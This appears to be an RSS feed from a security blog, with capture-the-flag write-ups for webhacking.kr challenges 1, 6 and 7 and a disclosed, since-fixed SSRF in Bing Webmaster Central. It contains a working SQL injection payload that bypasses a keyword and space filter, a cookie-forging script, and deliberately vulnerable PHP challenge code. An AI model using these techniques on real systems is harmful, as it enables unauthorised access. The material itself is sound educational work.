class="mi">1</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">]</span><span class="o">&gt;=</span><span class="mi">6</span><span class="p">)</span> <span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">]</span><span class="o">=</span><span class="mi">1</span><span class="p">;</span> <span class="k">if</span><span class="p">(</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user_lv</span><span class="p">]</span><span class="o">&gt;</span><span class="mi">5</span><span class="p">)</span> <span class="o">@</span><span class="nf">solve</span><span class="p">();</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;br&gt;level : </span><span class="nv">$_COOKIE[user_lv]</span><span class="s2">"</span><span class="p">);</span> <span class="cp">?&gt;</span> </pre></td></tr></tbody></table></code></pre></figure> <p>As this is the <a href="http://webhacking.kr/challenge/web/web-01/">first challenge</a>, let us analyse how it works. Firstly, the <code class="language-plaintext highlighter-rouge">if(!$_COOKIE[user_lv])</code> checks if a cookie named <code class="language-plaintext highlighter-rouge">user_lv</code> is already set. If not, it will create and set a new cookie with the value “1”.</p> <p>The eregi() function is actually depreicated from PHP 5.3 but since this challenge has been created before PHP 5.3, it still uses the function. The function <code class="language-plaintext highlighter-rouge">eregi("[^0-9,.]",$_COOKIE[user_lv])</code> will actually check if the value of cookie named <code class="language-plaintext highlighter-rouge">user_lv</code> has any characters other than numbers from 0 - 9 and “.”. If it encounters any other character, it resets the cookie value to one. You can read more about eregi in <a href="http://php.net/manual/en/function.eregi.php">PHP manual</a>.</p> <p><code class="language-plaintext highlighter-rouge">$_COOKIE[user_lv]&gt;=6</code> this will check if the cookie value is greater than 6 and if so, it resets again to 1. But from next line, <code class="language-plaintext highlighter-rouge">$_COOKIE[user_lv]&gt;5</code>, we can understand that for the challenge to be completed, the value of cookie should be greater than 5 but less than 6.</p> <p>Now, could you think of a solution ?</p> <p>If you solved the challenge in an easier way, do let me know. Let us share and learn :)</p> Wed, 02 Sep 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/09/02/0ldzombie-1/ https://blog.0daylabs.com/2015/09/02/0ldzombie-1/ webchallenges 0ldzombie SSRF attack using Microsoft's bing webmaster central <p>Recently when I was browsing through the internet, I came accross an awesome blogpost by Riyaz walikar on <a href="http://www.riyazwalikar.com/2012/11/cross-site-port-attacks-xspa-part-1.html">Cross Site Port Attacks (SSRF/XSPA)</a>. If you haven’t read it already, I strongly suggest you to read it.</p> <p>After reading the article, I was thinking of trying this attack at some place and the first thing that comes to my mind is Google’s webmasters tool but Riyaz has already reported the same. So no point in trying. So whats next? Then it came to my mind, what about Microsoft’s <a href="https://www.bing.com/webmaster">Bing Webmaster Central</a>? Alright, lets have a look.</p> <p>I went to the webmaster central and tried to add a new site <code class="language-plaintext highlighter-rouge">https://scanme.nmap.org:22</code> (basicaly because its not illegal to port scan the site as they give the permission to do so). Bing suggested me to add the verification tag to site but I didn’t bother because I cannot do it anyway. Then I simply clicked on verify and look at the result I got back from bing:</p> <p><img src="https://blog.0daylabs.com/images/Protocol_violation_for_open_ports.png" alt="Microsoft's bing SSRF" /></p> <p><code class="language-plaintext highlighter-rouge">Protocol violation</code> means the server expected the protocol to be http but since ssh was running in port 22, it gives back the error message. Now let us see what happens when I give a port number which is closed (22 was open). So I changed the port number from <code class="language-plaintext highlighter-rouge">22</code> to <code class="language-plaintext highlighter-rouge">15</code> and got back another error message:</p> <p><img src="https://blog.0daylabs.com/images/Connecion_failure when_port_is_closed.png" alt="Microsoft's bing SSRF" /></p> <p><code class="language-plaintext highlighter-rouge">Connect failure</code> means that the port is closed. By using this mechanism we can use the Bing to port scan any internet facing webservers.</p> <p>After this, I tried to do something else. Instead of giving the remote webservers, I started giving the possible internal IP address and for my surprize the bing is yeilding back the same result as it gave for remote servers ! Thats awesome isn’t it? Well, yes atleast when Bug hunters are concerned!</p> <p>I reported this to Microsoft few weeks back and the issue has been successfully fixed by the Microsoft. Also thanks to Microsoft for listing my name in their <a href="https://technet.microsoft.com/en-us/security/cc308589">Security hall of fame</a>.</p> <p>This is my first bug report. Hopefully I can find more in the coming days.</p> Sun, 09 Aug 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/08/09/SSRF-in-Microsoft-bing/ https://blog.0daylabs.com/2015/08/09/SSRF-in-Microsoft-bing/ bugbounty webhacking.kr - 0ldzombie challenge writeup 7 <p>So here we are, at level 7. One defect with this challenge site is that since this is not in the increasing order of difficulty, we cannot say that challenges will get more difficult as we crack more since that is how usual challenge sites works!</p> <p><strong>Note:</strong> <em>I am putting up the write up so that if you are not able to complete the challenges after trying for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <h4 id="challenge-7">Challenge 7</h4> <p>Now let us look into challenge 7. In the source file, you can immediately understand that the challenge is to inject SQL !</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?</span> <span class="nv">$answer</span> <span class="o">=</span> <span class="s2">"????"</span><span class="p">;</span> <span class="nv">$go</span><span class="o">=</span><span class="nv">$_GET</span><span class="p">[</span><span class="n">val</span><span class="p">];</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nv">$go</span><span class="p">)</span> <span class="p">{</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;meta http-equiv=refresh content=0;url=index.php?val=1&gt;"</span><span class="p">);</span> <span class="p">}</span> <span class="nv">$ck</span><span class="o">=</span><span class="nv">$go</span><span class="p">;</span> <span class="nv">$ck</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"*"</span><span class="p">,</span><span class="s2">""</span><span class="p">,</span><span class="nv">$ck</span><span class="p">);</span> <span class="nv">$ck</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"/"</span><span class="p">,</span><span class="s2">""</span><span class="p">,</span><span class="nv">$ck</span><span class="p">);</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;html&gt;&lt;head&gt;&lt;title&gt;admin page&lt;/title&gt;&lt;/head&gt;&lt;body bgcolor='black'&gt;&lt;font size=2 color=gray&gt;&lt;b&gt;&lt;h3&gt;Admin page&lt;/h3&gt;&lt;/b&gt;&lt;p&gt;"</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nb">eregi</span><span class="p">(</span><span class="s2">"--|2|50|\+|substring|from|infor|mation|lv|%20|=|!|&lt;&gt;|sysM|and|or|table|column"</span><span class="p">,</span><span class="nv">$ck</span><span class="p">))</span> <span class="k">exit</span><span class="p">(</span><span class="s2">"Access Denied!"</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nb">eregi</span><span class="p">(</span><span class="s1">' '</span><span class="p">,</span><span class="nv">$ck</span><span class="p">))</span> <span class="p">{</span> <span class="k">echo</span><span class="p">(</span><span class="s1">'cannot use space'</span><span class="p">);</span> <span class="k">exit</span><span class="p">();</span> <span class="p">}</span> <span class="nv">$rand</span><span class="o">=</span><span class="nb">rand</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="mi">5</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nv">$rand</span><span class="o">==</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$result</span><span class="o">=@</span><span class="nb">mysql_query</span><span class="p">(</span><span class="s2">"select lv from lv1 where lv=(</span><span class="nv">$go</span><span class="s2">)"</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s2">"nice try!"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$rand</span><span class="o">==</span><span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$result</span><span class="o">=@</span><span class="nb">mysql_query</span><span class="p">(</span><span class="s2">"select lv from lv1 where lv=((</span><span class="nv">$go</span><span class="s2">))"</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s2">"nice try!"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$rand</span><span class="o">==</span><span class="mi">3</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$result</span><span class="o">=@</span><span class="nb">mysql_query</span><span class="p">(</span><span class="s2">"select lv from lv1 where lv=(((</span><span class="nv">$go</span><span class="s2">)))"</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s2">"nice try!"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$rand</span><span class="o">==</span><span class="mi">4</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$result</span><span class="o">=@</span><span class="nb">mysql_query</span><span class="p">(</span><span class="s2">"select lv from lv1 where lv=((((</span><span class="nv">$go</span><span class="s2">))))"</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s2">"nice try!"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$rand</span><span class="o">==</span><span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$result</span><span class="o">=@</span><span class="nb">mysql_query</span><span class="p">(</span><span class="s2">"select lv from lv1 where lv=(((((</span><span class="nv">$go</span><span class="s2">)))))"</span><span class="p">)</span> <span class="k">or</span> <span class="k">die</span><span class="p">(</span><span class="s2">"nice try!"</span><span class="p">);</span> <span class="p">}</span> <span class="nv">$data</span><span class="o">=</span><span class="nb">mysql_fetch_array</span><span class="p">(</span><span class="nv">$result</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="p">{</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"query error"</span><span class="p">);</span> <span class="k">exit</span><span class="p">();</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">!=</span><span class="mi">1</span> <span class="o">&amp;&amp;</span> <span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">!=</span><span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="k">exit</span><span class="p">();</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">==</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;input type=button style=border:0;bgcolor='gray' value='auth' onclick= alert('Access_Denied!')&gt;&lt;p&gt;"</span><span class="p">);</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;!-- admin mode : val=2 --&gt;"</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span><span class="p">(</span><span class="nv">$data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">==</span><span class="mi">2</span><span class="p">)</span> <span class="p">{</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;input type=button style=border:0;bgcolor='gray' value='auth' onclick= alert('Congratulation')&gt;&lt;p&gt;"</span><span class="p">);</span> <span class="o">@</span><span class="nf">solve</span><span class="p">();</span> <span class="p">}</span> <span class="cp">?&gt;</span></code></pre></figure> <p>You can see clearly see that some common keywords from SQL are filtered and if we use the same, we get the message <code class="language-plaintext highlighter-rouge">Access Denied</code>. But to my surprise the most used keywords in SQL, ie, <code class="language-plaintext highlighter-rouge">select</code> and <code class="language-plaintext highlighter-rouge">union</code> where not filtered. Also from the source code, we can successfully login as admin only if we get the value 2. So we simply have to select the value 2. But the main problem here was that spaces are filtered. Without spaces, its difficult to craft a correct query. So I just looked into some filter evading techniques and I came to know that un-printable characters will be taken as spaces in MYSQL.</p> <p>So where ever I need space, I used <code class="language-plaintext highlighter-rouge">%0a</code> and this leads to a successful bypass. The payload looks like this:</p> <p><code class="language-plaintext highlighter-rouge">http://webhacking.kr/challenge/web/web-07/index.php?val=13)%0Aunion%0aselect%0a(5-3</code></p> <p>You might have to refresh the injection several times since this payload will work only if the rand value selected is 1. If you are lucky enough, you will get it at the first shot ;). Hope this helps !</p> Sat, 08 Aug 2015 00:00:00 -0700 https://blog.0daylabs.com/2015/08/08/0ldzombie-7/ https://blog.0daylabs.com/2015/08/08/0ldzombie-7/ webchallenges 0ldzombie webhacking.kr - 0ldzombie challenge writeup 6 <p>So now we have reached level 6 and the journey till now was quite challenging but enjoyable. Challenges by 0ldzombie is much better than several other web hacking challenges out there. Each level teaches us so much new information. Let us hope the future challenges will be even better.</p> <p><strong>Note:</strong> <em>I am putting up the write up so that if you are not able to complete the challenges after trying for awhile, you can refer to the solution to see how I did it. Please don’t look into the solution before you try out the challenges by yourself.</em></p> <p>The moment we open the <a href="http://webhacking.kr/challenge/web/web-06/">challenge 6 page</a>, first thing we see is the hint as <code class="language-plaintext highlighter-rouge">base64</code>. Well, base64 is an encoding and can be easily brought back to plain text. Also, the challenge page points us to <code class="language-plaintext highlighter-rouge">index.phps</code>. Let us see what is inside the source code:</p> <figure class="highlight"><pre><code class="language-php" data-lang="php"><span class="cp">&lt;?php</span> <span class="k">if</span><span class="p">(</span><span class="o">!</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user</span><span class="p">])</span> <span class="p">{</span> <span class="nv">$val_id</span><span class="o">=</span><span class="s2">"guest"</span><span class="p">;</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="s2">"123qwe"</span><span class="p">;</span> <span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="mi">20</span><span class="p">;</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">base64_encode</span><span class="p">(</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="p">}</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"1"</span><span class="p">,</span><span class="s2">"!"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"2"</span><span class="p">,</span><span class="s2">"@"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"3"</span><span class="p">,</span><span class="s2">"$"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"4"</span><span class="p">,</span><span class="s2">"^"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"5"</span><span class="p">,</span><span class="s2">"&amp;"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"6"</span><span class="p">,</span><span class="s2">"*"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"7"</span><span class="p">,</span><span class="s2">"("</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"8"</span><span class="p">,</span><span class="s2">")"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"1"</span><span class="p">,</span><span class="s2">"!"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"2"</span><span class="p">,</span><span class="s2">"@"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"3"</span><span class="p">,</span><span class="s2">"$"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"4"</span><span class="p">,</span><span class="s2">"^"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"5"</span><span class="p">,</span><span class="s2">"&amp;"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"6"</span><span class="p">,</span><span class="s2">"*"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"7"</span><span class="p">,</span><span class="s2">"("</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nv">$val_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"8"</span><span class="p">,</span><span class="s2">")"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="nb">Setcookie</span><span class="p">(</span><span class="s2">"user"</span><span class="p">,</span><span class="nv">$val_id</span><span class="p">);</span> <span class="nb">Setcookie</span><span class="p">(</span><span class="s2">"password"</span><span class="p">,</span><span class="nv">$val_pw</span><span class="p">);</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;meta http-equiv=refresh content=0&gt;"</span><span class="p">);</span> <span class="p">}</span> <span class="cp">?&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;title&gt;</span>Challenge 6<span class="nt">&lt;/title&gt;</span> <span class="nt">&lt;style </span><span class="na">type=</span><span class="s">"text/css"</span><span class="nt">&gt;</span> <span class="nt">body</span> <span class="p">{</span> <span class="nl">background</span><span class="p">:</span><span class="no">black</span><span class="p">;</span> <span class="nl">color</span><span class="p">:</span><span class="no">white</span><span class="p">;</span> <span class="nl">font-size</span><span class="p">:</span><span class="m">10pt</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/style&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="cp">&lt;?</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">user</span><span class="p">];</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nv">$_COOKIE</span><span class="p">[</span><span class="n">password</span><span class="p">];</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"!"</span><span class="p">,</span><span class="s2">"1"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"@"</span><span class="p">,</span><span class="s2">"2"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"$"</span><span class="p">,</span><span class="s2">"3"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"^"</span><span class="p">,</span><span class="s2">"4"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"&amp;"</span><span class="p">,</span><span class="s2">"5"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"*"</span><span class="p">,</span><span class="s2">"6"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"("</span><span class="p">,</span><span class="s2">"7"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">")"</span><span class="p">,</span><span class="s2">"8"</span><span class="p">,</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"!"</span><span class="p">,</span><span class="s2">"1"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"@"</span><span class="p">,</span><span class="s2">"2"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"$"</span><span class="p">,</span><span class="s2">"3"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"^"</span><span class="p">,</span><span class="s2">"4"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"&amp;"</span><span class="p">,</span><span class="s2">"5"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"*"</span><span class="p">,</span><span class="s2">"6"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">"("</span><span class="p">,</span><span class="s2">"7"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">str_replace</span><span class="p">(</span><span class="s2">")"</span><span class="p">,</span><span class="s2">"8"</span><span class="p">,</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="k">for</span><span class="p">(</span><span class="nv">$i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span><span class="nv">$i</span><span class="o">&lt;</span><span class="mi">20</span><span class="p">;</span><span class="nv">$i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$decode_id</span><span class="o">=</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$decode_id</span><span class="p">);</span> <span class="nv">$decode_pw</span><span class="o">=</span><span class="nb">base64_decode</span><span class="p">(</span><span class="nv">$decode_pw</span><span class="p">);</span> <span class="p">}</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"&lt;font style=background:silver;color:black&gt;&amp;nbsp;&amp;nbsp;HINT : base64&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;hr&gt;&lt;a href=index.phps style=color:yellow;&gt;index.phps&lt;/a&gt;&lt;br&gt;&lt;br&gt;"</span><span class="p">);</span> <span class="k">echo</span><span class="p">(</span><span class="s2">"ID : </span><span class="nv">$decode_id</span><span class="s2">&lt;br&gt;PW : </span><span class="nv">$decode_pw</span><span class="s2">&lt;hr&gt;"</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="nv">$decode_id</span><span class="o">==</span><span class="s2">"admin"</span> <span class="o">&amp;&amp;</span> <span class="nv">$decode_pw</span><span class="o">==</span><span class="s2">"admin"</span><span class="p">)</span> <span class="p">{</span> <span class="o">@</span><span class="nf">solve</span><span class="p">(</span><span class="mi">6</span><span class="p">,</span><span class="mi">100</span><span class="p">);</span> <span class="p">}</span> <span class="cp">?&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span></code></pre></figure> <p>So what is happening here? The first time look at the source code can be a bit frightening for those who are not well versed with PHP but its very easy. Basically, they take the word <strong>guest</strong> and will base64 encode it continuously for 20 times. After that numbers from 1 - 8 in the strings are replaced with some characters as shown in the code. Then when they decode the cookie, they first change the characters back and will base64 decode 20 times to get the original string back. Then if the values of username and password are <code class="language-plaintext highlighter-rouge">admin</code>, then we have solved the challenge successfully. Since I love python very much, I wrote a simple program which gives us the username/password combination we need to use in the cookies:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1">#!/usr/bin/python3.4 # Written by Anirudh Anand (lucif3r) : email - anirudh@anirudhanand.com </span> <span class="c1"># This is the solution to 0ldzombie's Webhacking.kr Challenge 6: Base64 cookie encoding # The script uses requests library in python 3.4 </span> <span class="kn">import</span> <span class="nn">base64</span> <span class="n">__author__</span> <span class="o">=</span> <span class="s">'lucif3r'</span> <span class="k">class</span> <span class="nc">Challenge6</span><span class="p">:</span> <span class="k">def</span> <span class="nf">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] 0ldZombie challenge6: - Base64 Cookie decode </span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">encode_cookie</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">21</span><span class="p">):</span> <span class="n">username</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64encode</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> <span class="n">replace</span> <span class="o">=</span> <span class="p">{</span><span class="s">'1'</span><span class="p">:</span> <span class="s">'!'</span><span class="p">,</span> <span class="s">'2'</span><span class="p">:</span> <span class="s">'@'</span><span class="p">,</span> <span class="s">'3'</span><span class="p">:</span> <span class="s">'$'</span><span class="p">,</span> <span class="s">'4'</span><span class="p">:</span> <span class="s">'^'</span><span class="p">,</span> <span class="s">'5'</span><span class="p">:</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'6'</span><span class="p">:</span> <span class="s">'*'</span><span class="p">,</span> <span class="s">'7'</span><span class="p">:</span> <span class="s">'('</span><span class="p">,</span> <span class="s">'8'</span><span class="p">:</span> <span class="s">')'</span><span class="p">}</span> <span class="n">username</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">replace_all</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">replace</span><span class="p">)</span> <span class="n">password</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">replace_all</span><span class="p">(</span><span class="n">password</span><span class="p">,</span> <span class="n">replace</span><span class="p">)</span> <span class="bp">self</span><span class="p">.</span><span class="n">print_all</span><span class="p">(</span><span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">)</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">replace_all</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">string</span><span class="p">,</span> <span class="n">replace</span><span class="p">):</span> <span class="s">""" This function will take a dictionary as an input and replaces the values with its keys in the strings. :param string: -&gt; The string which should be used to replace characters. :param replace: -&gt; A dictionary which contains the words to be replaced with their keys :return: """</span> <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">j</span> <span class="ow">in</span> <span class="n">replace</span><span class="p">.</span><span class="n">iteritems</span><span class="p">():</span> <span class="n">string</span> <span class="o">=</span> <span class="n">string</span><span class="p">.</span><span class="n">replace</span><span class="p">(</span><span class="n">i</span><span class="p">,</span> <span class="n">j</span><span class="p">)</span> <span class="k">return</span> <span class="n">string</span> <span class="k">def</span> <span class="nf">print_all</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">username</span><span class="p">,</span> <span class="n">password</span><span class="p">):</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Encoded username to be set as cookie is: </span><span class="se">\n</span><span class="s"> </span><span class="se">\n</span><span class="s">"</span> <span class="o">+</span> <span class="n">username</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"</span><span class="se">\n</span><span class="s">[+] -------------------------------------------------------------------------------------------[+] </span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="s">"[+] Encoded password to be set as cookie is: </span><span class="se">\n</span><span class="s"> </span><span class="se">\n</span><span class="s">"</span> <span class="o">+</span> <span class="n">password</span><span class="p">)</span> <span class="k">return</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="n">challenge6</span> <span class="o">=</span> <span class="n">Challenge6</span><span class="p">()</span> <span class="n">challenge6</span><span class="p">.</span><span class="n">encode_cookie</span><span class="p">(</span><span class="s">'admin'</span><span class="p">,</span> <span class="s">'admin'</span><span class="p">)</span> <span class="k">return</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span></code></pre></figure> <p><a class="btn btn-default" href="https://github.com/lucif3rr/Exploits-and-Scripts/blob/master/0ldzombie-Web/0ldzombie-chall6-base64cookie.py">Grab the script from 